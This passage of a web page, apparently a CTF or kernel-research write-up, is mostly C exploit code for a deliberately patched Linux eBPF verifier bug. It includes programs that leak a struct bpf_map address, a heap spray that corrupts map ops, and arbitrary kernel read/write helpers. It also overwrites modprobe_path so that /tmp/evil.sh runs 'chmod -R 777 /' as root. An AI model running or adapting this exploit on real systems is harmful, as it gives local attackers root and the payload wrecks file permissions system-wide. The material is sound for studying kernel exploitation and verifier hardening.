      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  const uint64_t kernel_base = aar64(bpf_map_addr) - BPF_MAP_OPS_OFFSET;
  printf(&amp;#34;[+] kernel_base: 0x%016lx\n&amp;#34;, kernel_base);

  const char* new_modprobe = &amp;#34;/tmp/evil.sh&amp;#34;;
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf(&amp;#34;[*] Overwrite modprobe to %s\n&amp;#34;, new_modprobe);
  for (size_t i = 0; i &amp;lt; new_modprobe_len; i += 8) {
    aaw64(kernel_base + MODPROB_OFFSET + i, *(uint64_t*)(new_modprobe + i));
  }
  {
    int fd = open(&amp;#34;/proc/sys/kernel/modprobe&amp;#34;, O_RDONLY);
    if (fd &amp;lt; 0) {
      fatal(&amp;#34;open(/proc/sys/kernel/modprobe)&amp;#34;);
    }

    char modprobe[0x100];
    read(fd, modprobe, sizeof(modprobe));
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf(&amp;#34;[*] new modprobe: %s\n&amp;#34;, modprobe);
      puts(&amp;#34;[-] Failed to overwrite modprobe&amp;#34;);
      return -1;
    }
    puts(&amp;#34;[+] Successfully overwritten modprobe&amp;#34;);
  }

  puts(&amp;#34;[+] Get root&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;#!/bin/sh\nchmod -R 777 /&amp;#39; &amp;gt; /tmp/evil.sh&amp;#34;);
  system(&amp;#34;chmod +x /tmp/evil.sh&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;\xde\xad\xbe\xef&amp;#39; &amp;gt; /tmp/pwn&amp;#34;);
  system(&amp;#34;chmod +x /tmp/pwn&amp;#34;);
  system(&amp;#34;/tmp/pwn&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h3 id=&#34;leaks&#34;&gt;Leaks&lt;/h3&gt;
&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-adjust_ptr_min_max_vals&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using &lt;code&gt;adjust_ptr_min_max_vals&lt;/code&gt;&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;546928317&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;546928317&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_adjust_ptr_min_max_vals.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-oob-read--heap-spray&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;376148295&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;376148295&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf1 - 1),  // arg4 = (0xf1-1) * arg4 == (actual_val=0xf1-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf1; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf1; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  memset(buf, &amp;#39;a&amp;#39;, 0xf0);
  buf[0xf0] = 0xa0 - 8;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t bpf_map_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      bpf_map_addr = val - 0x110;
      corrupted_map_fd = cur_map_fd;
      continue;
    }

    close(cur_map_fd);
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
